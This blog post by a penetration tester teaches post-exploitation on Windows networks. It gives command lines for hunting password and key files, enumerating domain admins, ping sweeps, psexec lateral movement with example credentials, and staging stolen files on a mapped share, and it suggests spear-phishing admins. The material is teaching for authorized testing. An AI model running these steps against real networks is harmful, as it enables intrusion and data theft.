I have a student that has been asking me about internal network penetration testing so I figured I’d write a blog post about it. I was trying to explain to him that there is so much more to it then just popping boxes. Breaking in a machine is easy, the moving around a network and stealing data without getting caught is the real skill. Basically, you want to use Tactics, Techniques, and Procedures (TTPs) used by Advanced Persistent Threat (APT).
When I do network penetration tests I explain to the customer that there are 4 levels of post exploitation and they need to choose what level they want me to use based on the goals of test.
- Level 1: Access – proving that you can gain access to hosts.
- Level 2: Leveraged Access – proving that you can jump from initially compromised hosts to other hosts in the network.
- Level 3: Data Driven Access – going after the target organization’s intellectual property, trade secrets or financials
- Level 4: Long term command and control (C2) – staying persistent in the environment for a prolonged period of time and exfiltrating data out of the network.
In this blog post I’ll try to cover a few of things we pentesters do on internal pentests to data mine the network.
Data Mining The Host
Ok, so you just broke into a machine with a browser, PDF, or java exploit. You are sitting at your meterpreter prompt. You can run a few meterpreter scripts like ‘winenum.rb’, ‘enum_domain_user’,
file_collector.rb, int_doc_find.rb or similar scripts but I’m going to try to walk you through doing this stuff without meterpreter scripts so you can better understand what those scripts are doing or write your own.
Let’s start by turning our meterpreter shell into a regular shell.
meterpreter> execute -c -H -f cmd -a “/k” -i
Let’s figure out which updates were installed on this computer with dism? Windows 7/8 (note: DISM will return far more details than WMIC.):
c:\DISM /Online /Get-Packages
c:\WMIC QFE List
OK, now that we have a regular command prompt let’s search the drive and sort the files by time accessed. We can use this to find important files by typing:.
c:\dir C:\ /S /OD /TA
If you actually know the date that a particular file was created you can search the drive and sort the files by time created by typing:.
c:\dir C:\ /S /OD /TC
You can do something similar by searching for files based on the modification date. You can search the drive and sort the files by time written by typing:
c:\dir C:\ /S /OD /TW
A trick that I use a lot is to search the drive for files with business critical words in the file names by typing the following:
c:\dir c:\*bank* /s
c:\dir c:\*password* /s
c:\dir c:\*pass* /s
c:\dir c:\*competitor* /s
c:\dir c:\*finance* /s
These are goodies for financial and risk related data.
c:\dir c:\*invoice* /s
c:\dir c:\*risk* /s
c:\dir c:\*assessment* /s
These are good when you are looking for specific file types (.key or .pem files for encryption keys and certificates, .vsd files for Visio network diagrams, .pcf files for VPN configuration files, .ica files for Citrix, and log files).
c:\dir c:\*.key* /s
c:\dir c:\*.vsd /s
c:\dir c:\*.pcf /s
c:\dir c:\*.ica /s
c:\dir c:\*.crt /s
c:\dir c:\*.log /s
I look really hard for .pcf, and .ica files. Anything that can give me legitimate access to the network. There is no better backdoor than legitimate access.
Now I did have had a pentest where the customer had named the password file GeorgeBush.xlxs – (yes, every network has a password text file or spreadsheet). Evidently a penetration tester before me had found the password file when it was called passwords.xlsx so they renamed the file. So to search the drive for files with critical data in them instead of just searching by name you can type:
c:\findstr /I /N /S /P /C:password *
c:\findstr /I /N /S /P /C:secret *
c:\findstr /I /N /S /P /C:confidential *
c:\findstr /I /N /S /P /C:account *
c:\findstr /I /N /S /P /C:payroll *
c:\findstr /I /N /S /P /C:credit *
c:\findstr /I /N /S /P /C:record *
Active Directory Enumeration
Ok so you’ve pilfered the host you compromised and now it’s time to spread your wings and look for new prey in the network. Let’s move on to active directory enumeration and I’ll just have to write another blog post on lateral movement later.
I like to use the net view command to look for other hosts in the network.
We can run net view /domain to get a list of the domains and workgroups in the target environment.
c:\net view /domain
Let’s look for local users (always check this – every once in a while you’ll run into a network that use local accounts for stuff). Sometimes system administrators do make use of local users and groups to do system administration tasks as a means of restricting access to the domain. This can be a good if done very carefully, and it could be really bad as it often forces the admin to do administrative tasks with the same local admin password throughout the entire environment.
Now let’s grab a list of users in the domain.
c:\net user /domain
The for the same reason we checked for local users we need to be sure to check for local groups as well.
c:\net localgroup /domain
c:\net localgroup administrators
Now, it’s time to get serious. The next few commands are where I get the really good info.
c:\net localgroup administrators /domain
Finding out the users in the domain is always handy, but nothing like the next command.
c:\net group “Domain Users” /domain
Now here is where you make your money. I like to look for users in the Domain Admins group. After compromising my first host – once I find a user in the Domain Admins group – I spear phish them. That’s usually the fastest way to domain admin level access for me.
c:\net group “Domain Admins” /domain
net user “jima” /domain
OK, now let’s start moving around the network. No Nmap – no problem. If you have time (because this is REALLY slow), you can ping sweep the network via a batch file.
echo @echo off > pingsweep.bat
echo for %%a in (1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155 156 157 158 159 160 161 162 163 164 165 166 167 168 169 170 171 172 173 174 175 176 177 178 179 180 181 182 183 184 185 186 187 188 189 190 191 192 193 194 195 196 197 198 199 200 201 202 203 204 205 206 207 208 209 210 211 212 213 214 215 216 217 218 219 220 221 222 223 224 225 226 227 228 229 230 231 232 233 234 235 236 237 238 239 240 241 242 243 244 245 246 247 248 249 250 251 252 253 254) do ping -n 2 -w 2000 %1.%%a >> pingsweep.bat
Ok – now all you have to do is just type ‘pingsweep’ and then the first 3 octets of the target subnet.
Now if you need to generate a list of IP addresses you can use this quick for loop.
for /L %i in (1,1,255) do @echo 10.10.30.%i >> ips.txt
Now let’s echo some domain names into a text file.
echo heat >> names.txt
echo jima >> names.txt
echo roge >> names.txt
echo patr >> names.txt
echo jami >> names.txt
echo bonn >> names.txt
echo rhon >> names.txt
echo sall >> names.txt
echo joyj >> names.txt
echo laur >> names.txt
echo sloa >> names.txt
echo Administrator >> names.txt
Now we can use a for loop to look for logged in users
for /f “tokens=1” %a in (‘net view ^| find “\\”‘) do @echo %a >> hosts.txt
Now once you have found machines with logged in users that you have passwords or hashes for you can PSExec to those machines. I know I didn’t cover password stealing and hashdumping – I’ll do it in another blog post if you guys want me to.
PSExec in Windows
c:\psexec.exe /accepteula \\10.10.30.81 -u administrator -p [email protected]! cmd.exe
PSExec in Linux
Just for the sake of making sure that you have this syntax – here is how to do PSExec in Linux. I prefer to use a tool called winexe. I have it on my Amazon S3 if you want to download it from me.
chmod 777 winexe
./winexe -U Administrator%[email protected]! //WIN7-X64-1 cmd.exe
Here is how I figure out how many users are logged on/connected to a server?
NET SESSION | FIND /C “\\”
Now you just move with psexec to the next machine and do the host data mining all over again (shampoo, lather, rinse, repeat). You do all of the dir commands again, and you do all of the findstr commands again. Grab all of the important files then you map a drive to what you want to become your staging server. Copy all of the important files to that staging server. Here is how to map a network drive.
net use O: \\10.10.30.89\c$ /u:administrator [email protected]!
net use /d O:
Whew, this was a long blog post. We covered a lot today, but there is a lot we didn’t cover. We didn’t cover password stealing, hashdump, pass the hash, or data exfiltration.
I’d love it if you check out the Metasploit Next Level Video Series for only $50:
Let’s call it quits right there, and I’ll come back in a day or so and give you something else to chew on.
Latest posts by joemccray (see all)
- Compromising WordPress and pivoting to the Internal Network - April 18, 2016
- Attacking Dell Foglight Server - October 21, 2015
- Using APT tactics and techniques in your pentests - October 15, 2015